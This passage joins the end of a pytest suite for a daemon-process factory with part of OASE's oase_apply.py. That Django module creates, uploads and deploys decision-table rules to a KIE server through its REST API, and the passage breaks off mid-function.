assert daemon.is_running()
# Assert against the context manager callbacks
assert stopped_callbacks.before_stop_callback_counter == 1
assert stopped_callbacks.after_stop_callback_counter == 1
assert stopped_callbacks.before_start_callback_counter == 1
assert stopped_callbacks.after_start_callback_counter == 1
assert daemon_started_once is True
# Assert against the non context manager callbacks
assert callbacks.before_start_callback_counter == 3
assert callbacks.after_start_callback_counter == 3
assert callbacks.before_terminate_callback_counter == 3
assert callbacks.after_terminate_callback_counter == 3
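# Counters for the custom start-check callbacks registered via daemon.start_check().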
@attr.s
class DaemonStartCheckCounter:
custom_start_check_1_callback_counter = attr.ib(default=0) # type: int
custom_start_check_2_callback_counter = attr.ib(default=0) # type: int
custom_start_check_3_callback_counter = attr.ib(default=0) # type: int
def custom_start_check_1_callback(self, timeout_at):
self.custom_start_check_1_callback_counter += 1
if self.custom_start_check_1_callback_counter > 2:
return True
return False
def custom_start_check_2_callback(self, timeout_at):
self.custom_start_check_2_callback_counter += 1
if self.custom_start_check_2_callback_counter > 2:
return True
raise Exception("Foo!")
def custom_start_check_3_callback(self, timeout_at):
self.custom_start_check_3_callback_counter += 1
time.sleep(1)
return False
def test_daemon_start_check_callbacks(request, factory_stopped_script):
daemon = Daemon(
script_name=sys.executable,
base_script_args=[factory_stopped_script],
start_timeout=3,
max_start_attempts=1,
check_ports=[12345],
)
callbacks = DaemonStartCheckCounter()
daemon.start_check(callbacks.custom_start_check_1_callback)
daemon.start_check(callbacks.custom_start_check_2_callback)
daemon_start_check_callbacks = daemon.get_start_check_callbacks()
with daemon.started():
# Both start callbacks should have run 3 times by now, at which
# time, they would have returned True
pass
assert callbacks.custom_start_check_1_callback_counter == 3
assert callbacks.custom_start_check_2_callback_counter == 3
# Assert that the list of callbacks is unchanged after running the start checks
assert daemon.get_start_check_callbacks() == daemon_start_check_callbacks
def test_daemon_no_start_check_callbacks(request, tempfiles: Tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(3)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
)
# Remove the check ports callback
daemon._start_checks_callbacks.clear()
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
with daemon.started():
# Daemon started without running any start checks
pass
assert not daemon.get_start_check_callbacks()
def test_daemon_start_check_callbacks_factory_not_running(request, tempfiles: Tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(2)
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
callbacks = DaemonStartCheckCounter()
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=2,
max_start_attempts=1,
)
# Make sure the daemon is terminated no matter what
request.addfinalizer(daemon.terminate)
daemon.start_check(callbacks.custom_start_check_3_callback)
with pytest.raises(FactoryNotStarted):
daemon.start()
# Make sure the callback was called more than once
assert callbacks.custom_start_check_3_callback_counter > 1
def test_context_manager_returns_class_instance(tempfiles):
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
sys.stdout.write("Done!\n")
sys.stdout.flush()
sys.exit(0)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=1,
max_start_attempts=1,
)
# Without starting the factory
started = d = None
with pytest.raises(RuntimeError):
with daemon as d:
# We should not even be able to set the following variable
started = d.is_running() # pragma: no cover
assert d is None
assert started is None
# After starting the factory
started = False
daemon.start()
with daemon as d:
# The daemon is running inside the context manager, so the variable does get set
started = d.is_running()
assert d.is_running() is False
assert started is True
# By starting the factory and passing timeout directly
started = False
with daemon.started(start_timeout=1) as d:
# The daemon is running inside the context manager, so the variable does get set
started = d.is_running()
assert d.is_running() is False
assert started is True
# By starting the factory without any keyword arguments
started = False
with daemon.started() as d:
# The daemon is running inside the context manager, so the variable does get set
started = d.is_running()
assert d.is_running() is False
assert started is True
@pytest.mark.parametrize("max_start_attempts", [1, 2, 3])
def test_exact_max_start_attempts(tempfiles, caplog, max_start_attempts):
"""
This test asserts that we properly report max_start_attempts.
"""
script = tempfiles.makepyfile(
r"""
# coding=utf-8
import sys
import time
import multiprocessing
def main():
time.sleep(0.125)
sys.exit(1)
# Support for windows test runs
if __name__ == '__main__':
multiprocessing.freeze_support()
main()
""",
executable=True,
)
daemon = Daemon(
script_name=sys.executable,
base_script_args=[script],
start_timeout=0.1,
max_start_attempts=max_start_attempts,
check_ports=[12345],
)
with caplog.at_level(logging.INFO):
with pytest.raises(FactoryNotStarted) as exc:
daemon.start()
assert "confirm running status after {} attempts".format(max_start_attempts) in str(
exc.value
)
start_attempts = [
"Attempt: {} of {}".format(n, max_start_attempts) for n in range(1, max_start_attempts + 1)
]
for record in caplog.records:
if not record.message.startswith("Starting Daemon"):
continue
for idx, start_attempt in enumerate(list(start_attempts)):
if start_attempt in record.message:
start_attempts.pop(idx)
assert not start_attempts
|
oase_apply.py
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[Overview]
Creates, updates, deletes and uploads rules.
Also downloads rule files.
"""
import os
import django
import sys
import socket
import pytz
import datetime
import json
import base64
import threading
import subprocess
import re
import requests
import time
import zipfile
import traceback
my_path = os.path.dirname(os.path.abspath(__file__))
tmp_path = my_path.split('oase-root')
root_dir_path = tmp_path[0] + 'oase-root'
sys.path.append(root_dir_path)
os.environ['DJANGO_SETTINGS_MODULE'] = 'confs.frameworkconfs.settings'
django.setup()
from django.db import transaction
from django.db.models import Q
from django.conf import settings
from libs.commonlibs.oase_logger import OaseLogger
logger = OaseLogger.get_instance()  # Initialize the logger
from libs.commonlibs.define import *
from libs.commonlibs.createxl import DecisionTableFactory
from libs.commonlibs.createxl import DecisionTableCustomizer
from libs.commonlibs.testrequest_createxl import TestRequestXlFactory
from libs.commonlibs.dt_component import DecisionTableComponent
from libs.commonlibs.aes_cipher import AESCipher
from libs.backyardlibs.backyard_common import disconnect
from web_app.models.models import RuleFile
from web_app.models.models import RuleType
from web_app.models.models import System
from web_app.models.models import User
from web_app.models.models import RuleManage
from web_app.models.models import DataObject
from web_app.models.models import AccessPermission
from web_app.templatetags.common import get_message
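# Module-level locks: APPLY_LOCK serializes kjar builds/deploys, DOWNLOAD_LOCK serializes zip downloads.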
APPLY_LOCK = threading.Lock()
DOWNLOAD_LOCK = threading.Lock()
APPLY_USER_ID = -2140000003
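# Convert an aware datetime to the given timezone and format it as a string.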
def conv_tz(dt, tzname):
return dt.astimezone(pytz.timezone(tzname)).strftime('%Y-%m-%d %H:%M:%S.%f')
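# Trim a response dict down to need_keys (or drop omit_keys) before sending it back to the caller.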
def make_send_data(data, need_keys=[], omit_keys=[]):
logger.logic_log('LOSI00001', 'need_keys: %s' % need_keys)
ret_data = data.copy()
if len(need_keys) > 0:
for k, v in ret_data.items():
if k not in need_keys:
omit_keys.append(k)
for k in omit_keys:
if k in ret_data:
ret_data.pop(k)
logger.logic_log('LOSI00002', 'None')
return ret_data
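# Create a new rule type: persist the RuleType and DataObject rows, generate the RHDM component skeleton and the decision-table / test-request Excel files.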
def create(request):
disconnect()
logger.logic_log('LOSI00001', request)
result = ''
msg = ''
# Extract parameters from the request
uid = int(request['user_id'])
table_info = request['table_info']
data_objs = request['data_obj_info']
label_cnt = request['label_count']
lang = request['lang']
notificationInfo = request['notificationInfo']
type_name = table_info['rule_type_name']
summary = table_info['summary']
table_name = table_info['rule_table_name']
now = datetime.datetime.now(pytz.timezone('UTC'))
user = User.objects.get(user_id=uid)
dtcomp = DecisionTableComponent(table_name)
unknown_event_notification = notificationInfo['unknown_event_notification']
mail_address = notificationInfo['mail_address']
servicenow_driver_id = notificationInfo['servicenow_driver_id']
rule_type_id = 0
ret_info = {
'result': 'OK',
'msg': '',
}
try:
with transaction.atomic():
########################################
# Save to DB
########################################
# Rule type
rule_type = RuleType(
rule_type_name=type_name,
summary=summary,
rule_table_name=table_name,
generation_limit=3,
group_id=dtcomp.group_id,
artifact_id=dtcomp.artifact_id,
container_id_prefix_staging=dtcomp.contid_stg,
container_id_prefix_product=dtcomp.contid_prd,
label_count=label_cnt,
unknown_event_notification=unknown_event_notification,
mail_address=mail_address,
servicenow_driver_id=servicenow_driver_id,
last_update_timestamp=now,
last_update_user=user.user_name
)
rule_type.save(force_insert=True)
# Data objects
data_obj_list = []
for dob in data_objs:
data_object = DataObject(
rule_type_id=rule_type.rule_type_id,
conditional_name=dob['conditional_name'],
label=dob['label'],
conditional_expression_id=int(dob['conditional_expression_id']),
last_update_timestamp=now,
last_update_user=user.user_name
)
data_obj_list.append(data_object)
if len(data_obj_list) > 0:
DataObject.objects.bulk_create(data_obj_list)
########################################
# Create the RHDM component
########################################
rule_type_id = rule_type.rule_type_id
dtcomp.make_component_all(rule_type_id)
########################################
# Create the Excel file (decision table)
########################################
dt_fact = DecisionTableFactory(
rule_type_id,
dtcomp.rule_set,
dtcomp.table_name,
dtcomp.class_name,
dtcomp.fact_name,
dtcomp.get_dtable_path()
)
success_flg = dt_fact.create_decision_table()
if not success_flg:
msg = 'MOSJA03501'
logger.system_log('LOSM12021', 'rule_type_id: %s, rule_type_name: %s' % (rule_type_id, type_name))
raise Exception()
########################################
# Create the Excel file (test request)
########################################
testreq_fact = TestRequestXlFactory(rule_type_id, dtcomp.table_name, dtcomp.get_dtable_path(), request)
success_flg = testreq_fact.create_testrequest_table()
if not success_flg:
msg = 'MOSJA03503'
logger.system_log('LOSM12053', 'rule_type_id: %s, rule_type_name: %s' % (rule_type_id, type_name))
raise Exception()
except FileExistsError as e:
# Raised during RHDM component creation when the directory for the new rule type already exists
logger.system_log('LOSM12051', 'traceback: %s' % traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03502',
}
except Exception as e:
if rule_type_id > 0:
dtcomp.remove_component(rule_type_id)
if not msg:
msg = 'MOSJA03001'
logger.system_log('LOSM12007', 'traceback: %s' % traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
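# Register an uploaded decision table: record RuleFile/RuleManage rows, copy the kjar build skeleton, then save and validate the uploaded Excel file.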
def upload(request):
disconnect()
logger.logic_log('LOSI00001', 'ruletypeid: %s, filename: %s' % (request['ruletypeid'], request['filename']))
result = ''
msg = ''
errmsg = ''
userlog = 'user_id=' + str(request['upload_user_id'])
errlog_prefix = True
ret_info = {
'result': 'OK',
'msg': '',
}
try:
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['upload_user_id'])
lang = user.get_lang_mode()
ruletypeid = int(request['ruletypeid'])
rulefile = None
rule_manage = None
try:
with transaction.atomic():
# Register the rule file in the DB
rulefile = RuleFile(
rule_type_id=ruletypeid,
rule_file_name=request['filename'],
last_update_timestamp=now,
last_update_user=user.user_name
)
rulefile.save(force_insert=True)
# Register the rule apply management record
rule_manage = RuleManage(
rule_type_id=ruletypeid,
request_type_id=STAGING,
rule_file_id=rulefile.pk,
system_status=RULE_STS_SYSTEM.UPLOAD,
operation_status=RULE_STS_OPERATION.STAGING_NOAPPLY,
last_update_timestamp=now,
last_update_user=user.user_name
)
rule_manage.save(force_insert=True)
except Exception as e:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
# Fetch the rule type information
ruleType = RuleType.objects.get(rule_type_id=ruletypeid)
artifactid = ruleType.artifact_id
groupid = ruleType.group_id
dtcomp = DecisionTableComponent(ruleType.rule_table_name)
dtcomp.set_path(rule_path['rule_srcpath'], '%s%s/' % (rule_path['rule_rootpath'], ruletypeid))
srcpath = dtcomp.get_pom_path()
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, rulefile.pk)
filepath = request['rule_filepath'] % (ruletypeid, rulefile.pk) + ruleType.rule_table_name + '/'
# Copy the files needed to build the kjar
os.makedirs(dstpath, exist_ok=True)
if not os.path.exists(srcpath):
try:
with transaction.atomic():
rule_manage.system_status = RULE_STS_SYSTEM.UPLOAD_NG
rule_manage.last_update_timestamp = now
rule_manage.last_update_user = user.user_name
rule_manage.save(force_update=True)
except Exception as e:
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03104', lang)
errmsg = errmsg + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e)
msg = 'MOSJA03104'
logger.system_log('LOSM12023',userlog)
raise Exception(errmsg)
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03102', lang)
msg = 'MOSJA03102'
logger.system_log('LOSM12024', srcpath)
raise Exception(errmsg)
dtcomp.copy_tree(dstpath)
# Save the rule file
os.makedirs(filepath, exist_ok=True)
filename = request['filename']
filedata = request['filedata']
filedata = base64.b64decode(filedata.encode('utf-8'))
with open(filepath + filename, 'wb') as fp:
fp.write(filedata)
# Validate the saved rule file
dtcomp.set_rule_type_id(ruletypeid)
errmsg_list = dtcomp.check_decision_table_file(filepath + filename, lang)
if len(errmsg_list) > 0:
errmsg += str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03121', lang) + '\n'
for em in errmsg_list:
errmsg += str(now_tz) + ' ' + userlog + ' ' + em + '\n'
errlog_prefix = False
logger.user_log('LOSM12061')
raise Exception(errmsg)
except User.DoesNotExist:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03101',
}
logger.system_log('LOSM12022', traceback.format_exc())
logger.logic_log('LOSI00002', ret_info)
return ret_info
except Exception as e:
rule_manage.system_status = RULE_STS_SYSTEM.UPLOAD_NG
rule_manage.last_update_timestamp = now
rule_manage.last_update_user = user.user_name
rule_manage.save(force_update=True)
errfilename = '%s_err.log' % (request['filename'].rsplit('.')[0])
errfilepath = dstpath + errfilename
errmsg = ''
if errlog_prefix:
errmsg = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03106', lang).replace('\\n', '\n')
errmsg = errmsg + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
else:
errmsg = str(e) + '\n'
if not os.path.exists(dstpath):
os.makedirs(dstpath, exist_ok=True)
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmsg)
msg = 'MOSJA03007' if not msg else msg
ret_info = {
'result': 'NG',
'msg': msg,
}
logger.system_log('LOSM12025', traceback.format_exc())
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
ret_info.update(
msg='MOSJA03002',
ruletypeid=ruletypeid,
rule_file_id=rulefile.pk,
artifactid=artifactid,
groupid=groupid,
pompath=dstpath,
request_type_id=STAGING,
apply_user_id=request['upload_user_id'],
rule_manage_id=rule_manage.rule_manage_id
)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
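# Handle a production apply request: create the production RuleManage record that apply() will later deploy.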
def apply_req(request):
disconnect()
logger.logic_log('LOSI00001', 'request: %s' % (request))
result = 'OK'
msg = ''
try:
ruletypeid = request['ruletypeid']
rulefileid = request['rule_file_id']
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
now = datetime.datetime.now(pytz.timezone('UTC'))
user = User.objects.get(user_id=request['apply_user_id'])
# Reject requests that are not for the production environment
if reqtypeid != PRODUCTION:
msg = 'MOSJA03202'
logger.system_log('LOSM12026', str(request['apply_user_id']), reqtypeid)
raise Exception()
# Create the production environment record
with transaction.atomic():
# Acquire the lock
ruleManageLock = RuleManage.objects.get(rule_manage_id=manageid)
# Check whether a production record has already been created
rcnt = RuleManage.objects.filter(
rule_type_id=ruleManageLock.rule_type_id,
request_type_id=ruleManageLock.request_type_id,
rule_file_id=ruleManageLock.rule_file_id,
operation_status=RULE_STS_OPERATION.PRODUCT
).count()
if rcnt > 0:
msg = 'MOSJA03201'
logger.system_log('LOSM12027',
str(request['apply_user_id']),
ruleManageLock.rule_type_id,
ruleManageLock.request_type_id,
ruleManageLock.rule_file_id)
raise Exception()
# Create the production environment data
ruleManage = RuleManage(
rule_type_id=ruletypeid,
request_type_id=reqtypeid,
rule_file_id=rulefileid,
system_status=RULE_STS_SYSTEM.PRODUCT,
operation_status=RULE_STS_OPERATION.PRODUCT_NOAPPLY,
last_update_timestamp=now,
last_update_user=user.user_name
)
ruleManage.save(force_insert=True)
request['rule_manage_id'] = ruleManage.rule_manage_id
except User.DoesNotExist:
result = 'NG'
msg = 'MOSJA32010'
logger.system_log('LOSM12068', traceback.format_exc())
except RuleManage.DoesNotExist:
result = 'NG'
msg = 'MOSJA03302'
logger.system_log('LOSM12035', str(request['apply_user_id']), manageid, traceback.format_exc())
except Exception as e:
result = 'NG'
msg = msg if msg else 'MOSJA03018'
logger.system_log('LOSM12069', traceback.format_exc())
ret_info = {
'result': result,
'msg': 'MOSJA03017' if result == 'OK' else msg,
}
return ret_info
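# Deploy the built kjar: create/replace the KIE container via the Decision Manager REST API, update statuses, remove the old container and prune old generations.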
def apply(request):
disconnect()
logger.logic_log('LOSI00001', 'request: %s' % (request))
try:
# Fetch data
ruletypeid = request['ruletypeid']
groupid = request['groupid']
artifactid = request['artifactid']
rulefileid = request['rule_file_id']
reqtypeid = request['request_type_id']
manageid = request['rule_manage_id']
rulefile = RuleFile.objects.get(rule_file_id=rulefileid)
filename = '%s_err.log' % (rulefile.rule_file_name.rsplit('.')[0])
errfilepath = '%s%s/%s/%s' % (request['rule_dstpath'], ruletypeid, rulefileid, filename)
userlog = 'user_id=' + str(request['apply_user_id'])
msg = ''
data = {}
data['release-id'] = {}
now = datetime.datetime.now(pytz.timezone('UTC'))
time_zone = settings.TIME_ZONE
now_tz = conv_tz(now, time_zone)
user = User.objects.get(user_id=request['apply_user_id'])
lang = user.get_lang_mode()
ret_info = {
'result': 'OK',
'msg': msg,
}
if reqtypeid not in [PRODUCTION, STAGING]:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03206',
lang, reqtypeid=reqtypeid).replace('\\n', '\n') + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
ret_info = {
'result': 'NG',
'msg': 'MOSJA03202'
}
logger.system_log('LOSM12026', str(request['apply_user_id']), reqtypeid)
logger.logic_log('LOSI00002', 'ret_info: %s' % ret_info)
return ret_info
with transaction.atomic():
ruleManageLock = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == PRODUCTION:
rcnt = RuleManage.objects.filter(
rule_type_id=ruleManageLock.rule_type_id,
request_type_id=ruleManageLock.request_type_id,
rule_file_id=ruleManageLock.rule_file_id,
operation_status=RULE_STS_OPERATION.PRODUCT
).count()
if rcnt > 0:
msg = 'MOSJA03201'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03201', lang)
logger.system_log('LOSM12027',
str(request['apply_user_id']),
ruleManageLock.rule_type_id,
ruleManageLock.request_type_id,
ruleManageLock.rule_file_id)
raise Exception(errmessage)
# Fetch the container ID
rule_type = RuleType.objects.select_for_update().get(rule_type_id=ruletypeid)
# Look up existing rule apply management records
tmp_working_rule = RuleManage.objects.select_for_update().filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid)
if reqtypeid == PRODUCTION:
tmp_working_rule = tmp_working_rule.filter(
system_status=RULE_STS_SYSTEM.PRODUCT_OK,
operation_status=RULE_STS_OPERATION.PRODUCT
)
elif reqtypeid == STAGING:
tmp_working_rule = tmp_working_rule.filter(
system_status=RULE_STS_SYSTEM.STAGING_OK,
operation_status__in=[
RULE_STS_OPERATION.STAGING_NOTYET,
RULE_STS_OPERATION.STAGING_VERIFY,
RULE_STS_OPERATION.STAGING_NG,
RULE_STS_OPERATION.STAGING
]
)
old_manage_ids = list(tmp_working_rule.values_list('rule_manage_id', flat=True))
# Fetch the rule apply management record to be applied
ruleManage = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == PRODUCTION:
ContID = rule_type.container_id_prefix_product
oldContID = rule_type.current_container_id_product
elif reqtypeid == STAGING:
ContID = rule_type.container_id_prefix_staging
oldContID = rule_type.current_container_id_staging
# Perform the deployment
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
ContID = ContID + '_' + datetime.datetime.now(pytz.timezone('UTC')).strftime('%Y%m%d%H%M%S%f')
data['container-id'] = ContID
data['status'] = 'STARTED'
data['release-id']['group-id'] = groupid
data['release-id']['artifact-id'] = artifactid
data['release-id']['version'] = rulefileid
send_data = json.dumps(data)
send_data = send_data.encode()
PROTOCOL, IPADDRPORT, dmuser, dmpass = get_dm_conf()
HTTP = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, ContID)
response = requests.put(HTTP, headers=headers, data=send_data, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response: %s, ContID: %s' % (response, ContID))
# Deployment failed
if response.status_code != 201:
ret_info = {
'result': 'NG',
'msg': 'MOSJA03204',
}
# Update the system processing status
# Apply terminated abnormally
if reqtypeid == PRODUCTION:
ruleManage.system_status = RULE_STS_SYSTEM.PRODUCT_NG
elif reqtypeid == STAGING:
ruleManage.system_status = RULE_STS_SYSTEM.STAGING_NG
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
if response.status_code == 400:
msg = 'MOSJA03208'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03208', lang)
logger.system_log('LOSM12029', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
elif response.status_code == 404:
msg = 'MOSJA03209'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03209', lang)
logger.system_log('LOSM12030', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
else:
msg = 'MOSJA03210'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03210', lang)
logger.system_log('LOSM12031', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
logger.system_log('LOSM12028', str(request['apply_user_id']), reqtypeid, ContID)
# Deployment succeeded
else:
# Update the current container ID
if reqtypeid == PRODUCTION:
RuleType.objects.filter(
rule_type_id=ruletypeid
).update(
current_container_id_product=ContID,
last_update_timestamp=now,
last_update_user=user.user_name
)
elif reqtypeid == STAGING:
RuleType.objects.filter(
rule_type_id=ruletypeid
).update(
current_container_id_staging=ContID,
last_update_timestamp=now,
last_update_user=user.user_name
)
# Update the system processing status
# Apply completed
if reqtypeid == PRODUCTION:
ruleManage.system_status = RULE_STS_SYSTEM.PRODUCT_OK
ruleManage.operation_status = RULE_STS_OPERATION.PRODUCT
elif reqtypeid == STAGING:
ruleManage.system_status = RULE_STS_SYSTEM.STAGING_OK
ruleManage.operation_status = RULE_STS_OPERATION.STAGING_NOTYET
ruleManage.last_update_timestamp = now
ruleManage.last_update_user = user.user_name
ruleManage.save(force_update=True)
# Delete the old container if one exists
if oldContID:
# Wait briefly before deleting
time.sleep(5)
# Delete the old container
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
HTTP2 = '%s://%s/decision-central/rest/controller/management/servers/default-kieserver/containers/%s' % (
PROTOCOL, IPADDRPORT, oldContID)
response2 = requests.delete(HTTP2, headers=headers, auth=(dmuser, dmpass))
logger.system_log('LOSI12000', 'response2: %s, oldContID: %s' % (response2, oldContID))
# For production processing
# Update the system processing status of the previously applied records
mod_sts = RULE_STS_OPERATION.STAGING_END
if reqtypeid == PRODUCTION:
mod_sts = RULE_STS_OPERATION.PRODUCT_END
if len(old_manage_ids) > 0:
RuleManage.objects.filter(
rule_manage_id__in=old_manage_ids).exclude(
rule_manage_id=manageid
).update(
operation_status=mod_sts,
last_update_timestamp=now,
last_update_user=user.user_name
)
if response2.status_code != 204:
if response2.status_code == 400:
msg = 'MOSJA03215'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03215', lang)
logger.system_log('LOSM12032', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
# A 404 when deleting the container means it has already been removed, so record it in the file and treat it as quasi-normal.
elif response2.status_code == 404:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03216', lang) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12033', str(request['apply_user_id']), reqtypeid, ContID)
else:
msg = 'MOSJA03217'
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03217', lang)
logger.system_log('LOSM12034', str(request['apply_user_id']), reqtypeid, ContID)
raise Exception(errmessage)
# Generation management
table_name = rule_type.rule_table_name
dtcomp = DecisionTableComponent(table_name)
dtcomp.set_rule_type_id(ruletypeid)
if reqtypeid == PRODUCTION:
production_generation = int(System.objects.get(config_id='PRODUCTION_GENERATION').value)
if production_generation > 0:
# Remove old production apply history records
production_rules_queryset = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid
).filter(
system_status=RULE_STS_SYSTEM.PRODUCT_OK
)
p_rules_cnt = production_rules_queryset.count()
if p_rules_cnt > production_generation:
p_rules = list(production_rules_queryset.order_by('rule_manage_id').reverse())
p_rules_del = p_rules[production_generation:]
logger.system_log('LOSI12007', ', '.join([str(r.rule_manage_id) for r in p_rules_del]))
for p_rule_manage in p_rules_del:
# Delete the rule file
# However, do not delete files that are still used by staging
p_rule_file_id = p_rule_manage.rule_file_id
qs = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=STAGING, rule_file_id=p_rule_file_id)
if qs.count() == 0:
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, p_rule_file_id)
dtcomp.remove_component_related_one_file(dstpath)
dtcomp.remove_mavenrepository_related_one_file(p_rule_file_id)
else:
logger.system_log('LOSM12058', p_rule_file_id)
# Delete the manage record
p_rule_manage.delete()
# Delete records that errored while applying to production
RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=reqtypeid
).filter(
system_status=RULE_STS_SYSTEM.PRODUCT_NG
).delete()
elif reqtypeid == STAGING:
staging_generation = int(System.objects.get(config_id='STAGING_GENERATION').value)
if staging_generation > 0:
# Staging cleanup
staging_rules_queryset = RuleManage.objects.filter(
rule_type_id=ruletypeid,
request_type_id=reqtypeid
).exclude(
system_status__in=[
RULE_STS_SYSTEM.UPLOAD,
RULE_STS_SYSTEM.UPLOAD_OK,
RULE_STS_SYSTEM.BUILD,
RULE_STS_SYSTEM.BUILD_OK,
])
s_rules_cnt = staging_rules_queryset.count()
if s_rules_cnt > staging_generation:
s_rules = list(staging_rules_queryset.order_by('rule_manage_id').reverse())
s_rules_del = s_rules[staging_generation:]
logger.system_log('LOSI12008', ', '.join([str(r.rule_manage_id) for r in s_rules_del]))
for s_rule_manage in s_rules_del:
# Delete the rule file
# However, do not delete files that are still used by production
s_rule_file_id = s_rule_manage.rule_file_id
qs = RuleManage.objects.filter(
rule_type_id=ruletypeid, request_type_id=PRODUCTION, rule_file_id=s_rule_file_id)
if qs.count() == 0:
dstpath = '%s%s/%s/' % (request['rule_dstpath'], ruletypeid, s_rule_file_id)
dtcomp.remove_component_related_one_file(dstpath)
dtcomp.remove_mavenrepository_related_one_file(s_rule_file_id)
else:
logger.system_log('LOSM12059', s_rule_manage.rule_file_id)
# Delete the manage record
s_rule_manage.delete()
ret_info = {
'result': 'OK',
'msg': 'MOSJA03003',
}
except RuleFile.DoesNotExist:
logger.system_log('LOSM12019', traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03013',
}
except User.DoesNotExist:
logger.system_log('LOSM12022', traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA32010',
}
except RuleManage.DoesNotExist:
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03218',
lang, manageid=manageid).replace('\\n', '\n')
errmessage = errmessage + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12035', str(request['apply_user_id']), manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': 'MOSJA03302',
}
except Exception as e:
try:
rulemanage = RuleManage.objects.get(rule_manage_id=manageid)
if reqtypeid == STAGING:
rulemanage.system_status = RULE_STS_SYSTEM.STAGING_NG
rulemanage.last_update_timestamp = now
rulemanage.last_update_user = user.user_name
rulemanage.save(force_update=True)
elif reqtypeid == PRODUCTION:
rulemanage.system_status = RULE_STS_SYSTEM.PRODUCT_NG
rulemanage.last_update_timestamp = now
rulemanage.last_update_user = user.user_name
rulemanage.save(force_update=True)
errmessage = str(now_tz) + ' ' + userlog + ' ' + get_message('MOSJA03219', lang).replace('\\n', '\n')
errmessage = errmessage + '\n' + str(now_tz) + ' ' + userlog + ' ' + str(e) + '\n'
with open(errfilepath, 'a', encoding='utf8') as f:
f.write(errmessage)
logger.system_log('LOSM12036', str(request['apply_user_id']), reqtypeid, manageid, traceback.format_exc())
ret_info = {
'result': 'NG',
'msg': msg,
}
except Exception as e:
